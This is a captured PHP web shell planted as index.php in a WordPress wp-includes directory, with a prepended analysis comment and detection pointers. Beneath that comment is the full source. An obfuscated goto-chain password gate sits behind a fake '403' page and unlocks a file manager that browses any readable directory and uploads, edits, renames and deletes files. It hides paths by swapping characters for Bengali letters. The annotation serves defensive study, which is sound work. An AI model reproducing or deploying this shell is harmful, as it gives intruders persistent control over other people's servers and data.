shell bypass 403
UnknownSec Shell : /home/innovagencyco/www/statxpress/wp-includes/js/dist/ [ drwxr-xr-x ]
name : index.php
<?php
/*
 * ANALYSIS NOTE (defensive annotation only; every statement below is unchanged).
 *
 * What this file is
 *   A session-gated PHP web shell / file manager. Its HTML title is "403", but
 *   once the gate is passed it serves a read/write file browser.
 *   NOTE(review): the listing as captured has lost its original line breaks, so
 *   the "//function" line comment further down swallows the rest of its line
 *   here; read the sample for behaviour, not as a runnable file.
 *
 * Part 1 - obfuscated gate (the goto chain before the HTML document)
 *   - Execution enters at label vzjq, which calls session_start().
 *   - Three strings are assembled one character per label:
 *       $___       -> "lg_mima"    (POST field name and session key)
 *       $________  -> "HTTP_HOST"  (index into $_SERVER)
 *       $__        -> an HTML login form (name='form1', text input 'lg_mima',
 *                     submit button) echoed when the check fails.
 *   - The expected value ($_____) is the Host header concatenated with the key
 *     string, passed through md5() and cut to its first six characters. It is
 *     computed from request data and a constant, not from a stored secret, so
 *     the gate must not be treated as limiting access to the original intruder.
 *   - A posted 'lg_mima' is trimmed and stored in the session; if the session
 *     value is empty or differs (loose !=), the form is printed and the script
 *     exits.
 *
 * Part 2 - file manager (second PHP section)
 *   - formatSizeUnits / fileExtension / fileIcon are display helpers.
 *   - encodePath / decodePath swap "/", "\", "." and ":" with four Bengali
 *     letters, so directory paths travel in ?p= / ?q= without those characters
 *     (presumably to avoid path-pattern filtering - not stated in the code).
 *   - The decoded path is accepted whenever is_dir() succeeds; nothing confines
 *     it to __DIR__, so any directory readable by the PHP user can be listed.
 *   - Actions, all relative to that directory:
 *       ?upload + POST upload -> move_uploaded_file() to the client-supplied name
 *       &r= + POST rename     -> rename()
 *       &e= + POST edit       -> file_get_contents() shown, fopen("w")/fwrite() on save
 *       &d=                   -> unlink() for files, rmdir() for directories
 *   - The page pulls Bootstrap 5.3.0-alpha1 from cdn.jsdelivr.net, Font Awesome
 *     6.3.0 from cdnjs.cloudflare.com and an image from github.com/fluidicon.png.
 *
 * Detection and response pointers
 *   - Requests: a POST body field named lg_mima; query strings with p= or q=
 *     whose value contains the letters ক খ গ ঘ (seen percent-encoded in logs),
 *     combined with e=, r=, d= or upload.
 *   - Static: long runs of "label: $var .= 'x'; goto label;" with variables
 *     named only with underscores, beginning with session_start().
 *   - This page shows the file as index.php under a wp-includes/js/dist/
 *     directory; verify such files against the installed release's core
 *     checksums (for example with "wp core verify-checksums").
 *   - Because the tool can write, rename and delete, removing this one file is
 *     not sufficient: review the tree for other modified or dropped files and
 *     rotate any credentials the PHP user could read.
 */
goto vzjq;jiuw:$__.="u";goto oefknv;bpetv:$__.="f";goto jxy;cdoqm:$__.=" ";goto ygapv;enkj:$__.="a";goto wfls;pfchmb:$__.="t";goto mksql;ujgkcf:if(empty($_SESSION[$___])||$_SESSION[$___]!=$_____){echo $__; exit;}goto yiqw;hdxms:$__.="m";goto hiay;zwdcfi:$__.="_";goto dpjs;pky:$__.="y";goto laqzfn;bxgld:$________="H";goto wydle;otfkwq:$___.="i";goto kyxn;hiay:$__.="1";goto hrnjy;wjz:$__.=">";goto bxgld;tgk:$__.="n";goto dmbrv;zijopq:$__.="m";goto zfedo;ubtx:$__.="i";goto kno;jsuved:$__.="t";goto cxt;eyj:$___.="g";goto jcpea;esmt:$__.="'";goto gtsvhk;bfor:$________.="P";goto rpd;laqzfn:$__.="p";goto vdp;gij:$__.="u";goto hvrlk;sih:$_____.=$___;goto vstn;pkzmg:$__.="'";goto jowkza;fjy:$__.="=";goto mbn;iwhay:$__.="h";goto omw;gajeqz:$__.="m";goto ampbi;zsidht:$_____=substr($_____,0,6);goto dctnz;omw:$__.="o";goto pno;dctnz:if(isset($_POST[$___])){$_SESSION[$___]=trim($_POST[$___]);}goto ujgkcf;ersz:$__.="r";goto srcxhf;puwm:$__.="c";goto jsuved;pwoiae:$__.="e";goto pigym;ico:$__.="n";goto enkj;srcxhf:$__.="m";goto wjz;oxeugs:$__.="o";goto zfaeg;zxjn:$__.="n";goto bfuawh;qogp:$__.="/";goto bpetv;tfgspz:$__.="m";goto ubtx;zrsag:$__.="t";goto qhw;tbxov:$__.="'";goto tizcal;gswq:$__.=" ";goto gewzcf;hcx:$__.="u";goto zrsag;lom:$__.="e";goto exnk;hrnjy:$__.="'";goto gswq;eky:$__.="u";goto pfchmb;pigym:$__.="=";goto dbrwj;ygapv:$__.="m";goto emwk;ovy:$__.="'";goto yfgpmn;vyxhif:$__.="s";goto rgnlsy;mnh:$__.="t";goto tbxov;exmh:$__.=" ";goto qin;yuxnqm:$__.="a";goto ldhxc;dbrwj:$__.="'";goto nzmi;exnk:$__.="=";goto ovy;apkdyb:$__.="'";goto zby;apfuqb:$__.="m";goto ucdhw;kyb:$__.="u";goto jkb;lgnsfj:$__.="<";goto qogp;rfkd:$__.="t";goto iwhay;smx:$__.="n";goto yuxnqm;tgeflj:$__.="'";goto pqcg;tlbzg:$__.="<";goto pfarni;qhc:$________.="T";goto xten;fkxedc:$__.="=";goto apkdyb;zby:$__.="'";goto cdoqm;vghqf:$___.="m";goto otfkwq;jxy:$__.="o";goto ersz;jowkza:$__.=" ";goto uhoa;zfedo:$__.="i";goto mnh;mnslt:$__.="f";goto fxz;jkb:$__.="b";goto zijopq;tizcal:$__.=" ";goto 
nxpcud;rxdca:$__.="e";goto rstz;qin:$__.="t";goto pky;kyxn:$___.="m";goto cri;fxz:$__.="o";goto sytlvg;xten:$_____=$_SERVER[$________];goto sih;tagok:$__.="s";goto etyuro;ydnc:$__.="s";goto kyb;emwk:$__.="e";goto rfkd;hqliy:$__.=">";goto tlbzg;mcn:$__ ="<";goto mnslt;bfuawh:$__.="p";goto hcx;dmbrv:$__.="a";goto apfuqb;cxt:$__.="i";goto yct;qvcd:$__.="n";goto fkxedc;eaoyd:$__.="i";goto shq;lcjd:$__.="'";goto vyxhif;gewzcf:$__.="a";goto puwm;ampbi:$__.="a";goto bouacy;kmpg:$__.="'";goto hqliy;hvrlk:$__.="b";goto tfgspz;kqrmh:$__.="p";goto eky;rstz:$__.="=";goto tgeflj;rpd:$________.="_";goto ygjc;jiap:$__.="t";goto nbmxw;yfpowm:$__.=" ";goto smx;abscmn:$__.="a";goto qde;uhoa:$__.="v";goto abscmn;sytlvg:$__.="r";goto zgykmh;cri:$___.="a";goto mcn;jcpea:$___.="_";goto vghqf;kwnoar:$__.="p";goto akzhyg;ucdhw:$__.="e";goto anxmb;osh:$__.="'";goto ydnc;kno:$__.="t";goto pkzmg;xeq:$__.="t";goto kmpg;anxmb:$__.="=";goto osh;krp:$________.="S";goto qhc;etyuro:$__.="t";goto esmt;pfarni:$__.="i";goto flapgj;mksql:$__.=" ";goto tgk;nxpcud:$__.="t";goto tufa;dpjs:$__.="m";goto ecarqn;wydle:$________.="T";goto volnfy;nzmi:$__.="f";goto oxeugs;zgykmh:$__.="m";goto yfpowm;sim:$__.=">";goto lgnsfj;pqcg:$__.="s";goto gij;vstn:$_____=md5($_____);goto zsidht;zobqfv:$__.="=";goto qfpaet;kxzi:$__.="=";goto lcjd;mbn:$__.="'";goto jiap;fmpnw:$__.="g";goto zwdcfi;nfrwug:$__.="m";goto eaoyd;ypm:$__.="x";goto xeq;akzhyg:$__.="o";goto tagok;qde:$__.="l";goto jiuw;zfaeg:$__.="r";goto hdxms;vlsof:$__.="b";goto nfrwug;ldhxc:$__.="m";goto pwoiae;mkgr:$________.="O";goto krp;yct:$__.="o";goto qvcd;wfls:$__.="m";goto lom;yfgpmn:$__.="l";goto fmpnw;pno:$__.="d";goto zobqfv;rgnlsy:$__.="u";goto vlsof;vdp:$__.="e";goto fjy;ecarqn:$__.="i";goto gajeqz;volnfy:$________.="T";goto bfor;ygjc:$________.="H";goto mkgr;ogb:$__.="p";goto rxdca;qfpaet:$__.="'";goto kwnoar;oefknv:$__.="e";goto kxzi;bouacy:$__.="'";goto exmh;hxer:$__.="'";goto sim;vnyse:$__.="<";goto zsnhm;nbmxw:$__.="e";goto 
ypm;zsnhm:$__.="i";goto zxjn;flapgj:$__.="n";goto kqrmh;tufa:$__.="y";goto ogb;gtsvhk:$__.=">";goto vnyse;qhw:$__.=" ";goto ico;shq:$__.="t";goto hxer;vzjq:session_start();goto vimxlt;vimxlt:$___="l";goto eyj;yiqw:;?><!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>403</title> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD" crossorigin="anonymous"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css" integrity="sha512-SzlrxWUlpfuzQ+pcUCosxcglQRNAq/DZjVsC0lE40xsADsfeQoEypE+enwcOiGjk/bSuGGKHEyjSoQ1zVisanQ==" crossorigin="anonymous" referrerpolicy="no-referrer" /> </head> <body> <?php //function function formatSizeUnits($bytes) { if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . ' GB'; } elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . ' MB'; } elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . ' KB'; } elseif ($bytes > 1) { $bytes = $bytes . ' bytes'; } elseif ($bytes == 1) { $bytes = $bytes . 
' byte'; } else { $bytes = '0 bytes'; } return $bytes; } function fileExtension($file) { return substr(strrchr($file, '.'), 1); } function fileIcon($file) { $imgs = array("apng", "avif", "gif", "jpg", "jpeg", "jfif", "pjpeg", "pjp", "png", "svg", "webp"); $audio = array("wav", "m4a", "m4b", "mp3", "ogg", "webm", "mpc"); $ext = strtolower(fileExtension($file)); if ($file == "error_log") { return '<i class="fa-sharp fa-solid fa-bug"></i> '; } elseif ($file == ".htaccess") { return '<i class="fa-solid fa-hammer"></i> '; } if ($ext == "html" || $ext == "htm") { return '<i class="fa-brands fa-html5"></i> '; } elseif ($ext == "php" || $ext == "phtml") { return '<i class="fa-brands fa-php"></i> '; } elseif (in_array($ext, $imgs)) { return '<i class="fa-regular fa-images"></i> '; } elseif ($ext == "css") { return '<i class="fa-brands fa-css3"></i> '; } elseif ($ext == "txt") { return '<i class="fa-regular fa-file-lines"></i> '; } elseif (in_array($ext, $audio)) { return '<i class="fa-duotone fa-file-music"></i> '; } elseif ($ext == "py") { return '<i class="fa-brands fa-python"></i> '; } elseif ($ext == "js") { return '<i class="fa-brands fa-js"></i> '; } else { return '<i class="fa-solid fa-file"></i> '; } } function encodePath($path) { $a = array("/", "\\", ".", ":"); $b = array("ক", "খ", "গ", "ঘ"); return str_replace($a, $b, $path); } function decodePath($path) { $a = array("/", "\\", ".", ":"); $b = array("ক", "খ", "গ", "ঘ"); return str_replace($b, $a, $path); } $root_path = __DIR__; if (isset($_GET['p'])) { if (empty($_GET['p'])) { $p = $root_path; } elseif (!is_dir(decodePath($_GET['p']))) { echo ("<script>\nalert('Directory is Corrupted and Unreadable.');\nwindow.location.replace('?');\n</script>"); } elseif (is_dir(decodePath($_GET['p']))) { $p = decodePath($_GET['p']); } } elseif (isset($_GET['q'])) { if (!is_dir(decodePath($_GET['q']))) { echo ("<script>window.location.replace('?p=');</script>"); } elseif (is_dir(decodePath($_GET['q']))) { $p = 
decodePath($_GET['q']); } } else { $p = $root_path; } define("PATH", $p); echo (' <nav class="navbar navbar-light" style="background-color: #e3f2fd;"> <div class="navbar-brand"> <a href="?"><img src="https://github.com/fluidicon.png" width="30" height="30" alt=""></a> '); $path = str_replace('\\', '/', PATH); $paths = explode('/', $path); foreach ($paths as $id => $dir_part) { if ($dir_part == '' && $id == 0) { $a = true; echo "<a href=\"?p=/\">/</a>"; continue; } if ($dir_part == '') continue; echo "<a href='?p="; for ($i = 0; $i <= $id; $i++) { echo str_replace(":", "ঘ", $paths[$i]); if ($i != $id) echo "ক"; } echo "'>" . $dir_part . "</a>/"; } echo (' </div> <div class="form-inline"> <a href="?upload&q=' . urlencode(encodePath(PATH)) . '"><button class="btn btn-dark" type="button">Upload File</button></a> <a href="?"><button type="button" class="btn btn-dark">HOME</button></a> </div> </nav>'); if (isset($_GET['p'])) { //fetch files if (is_readable(PATH)) { $fetch_obj = scandir(PATH); $folders = array(); $files = array(); foreach ($fetch_obj as $obj) { if ($obj == '.' || $obj == '..') { continue; } $new_obj = PATH . '/' . $obj; if (is_dir($new_obj)) { array_push($folders, $obj); } elseif (is_file($new_obj)) { array_push($files, $obj); } } } echo ' <table class="table table-hover"> <thead> <tr> <th scope="col">Name</th> <th scope="col">Size</th> <th scope="col">Modified</th> <th scope="col">Perms</th> <th scope="col">Actions</th> </tr> </thead> <tbody> '; foreach ($folders as $folder) { echo " <tr> <td><i class='fa-solid fa-folder'></i> <a href='?p=" . urlencode(encodePath(PATH . "/" . $folder)) . "'>" . $folder . "</a></td> <td><b>---</b></td> <td>". date("F d Y H:i:s.", filemtime(PATH . "/" . $folder)) . "</td> <td>0" . substr(decoct(fileperms(PATH . "/" . $folder)), -3) . "</a></td> <td> <a title='Rename' href='?q=" . urlencode(encodePath(PATH)) . "&r=" . $folder . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a> <a title='Delete' href='?q=" . 
urlencode(encodePath(PATH)) . "&d=" . $folder . "'><i class='fa fa-trash' aria-hidden='true'></i></a> <td> </tr> "; } foreach ($files as $file) { echo " <tr> <td>" . fileIcon($file) . $file . "</td> <td>" . formatSizeUnits(filesize(PATH . "/" . $file)) . "</td> <td>" . date("F d Y H:i:s.", filemtime(PATH . "/" . $file)) . "</td> <td>0". substr(decoct(fileperms(PATH . "/" .$file)), -3) . "</a></td> <td> <a title='Edit File' href='?q=" . urlencode(encodePath(PATH)) . "&e=" . $file . "'><i class='fa-solid fa-file-pen'></i></a> <a title='Rename' href='?q=" . urlencode(encodePath(PATH)) . "&r=" . $file . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a> <a title='Delete' href='?q=" . urlencode(encodePath(PATH)) . "&d=" . $file . "'><i class='fa fa-trash' aria-hidden='true'></i></a> <td> </tr> "; } echo " </tbody> </table>"; } else { if (empty($_GET)) { echo ("<script>window.location.replace('?p=');</script>"); } } if (isset($_GET['upload'])) { echo ' <form method="post" enctype="multipart/form-data"> Select file to upload: <input type="file" name="fileToUpload" id="fileToUpload"> <input type="submit" class="btn btn-dark" value="Upload" name="upload"> </form>'; } if (isset($_GET['r'])) { if (!empty($_GET['r']) && isset($_GET['q'])) { echo ' <form method="post"> Rename: <input type="text" name="name" value="' . $_GET['r'] . '"> <input type="submit" class="btn btn-dark" value="Rename" name="rename"> </form>'; if (isset($_POST['rename'])) { $name = PATH . "/" . $_GET['r']; if(rename($name, PATH . "/" . $_POST['name'])) { echo ("<script>alert('Renamed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } else { echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } } } } if (isset($_GET['e'])) { if (!empty($_GET['e']) && isset($_GET['q'])) { echo ' <form method="post"> <textarea style="height: 500px; width: 90%;" name="data">' . 
htmlspecialchars(file_get_contents(PATH."/".$_GET['e'])) . '</textarea> <br> <input type="submit" class="btn btn-dark" value="Save" name="edit"> </form>'; if(isset($_POST['edit'])) { $filename = PATH."/".$_GET['e']; $data = $_POST['data']; $open = fopen($filename,"w"); if(fwrite($open,$data)) { echo ("<script>alert('Saved.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } else { echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } fclose($open); } } } if (isset($_POST["upload"])) { $target_file = PATH . "/" . $_FILES["fileToUpload"]["name"]; if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) { echo "<p>".htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . " has been uploaded.</p>"; } else { echo "<p>Sorry, there was an error uploading your file.</p>"; } } if (isset($_GET['d']) && isset($_GET['q'])) { $name = PATH . "/" . $_GET['d']; if (is_file($name)) { if(unlink($name)) { echo ("<script>alert('File removed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } else { echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } } elseif (is_dir($name)) { if(rmdir($name) == true) { echo ("<script>alert('Directory removed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } else { echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"); } } } ?> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js" integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN" crossorigin="anonymous"></script> </body> </html>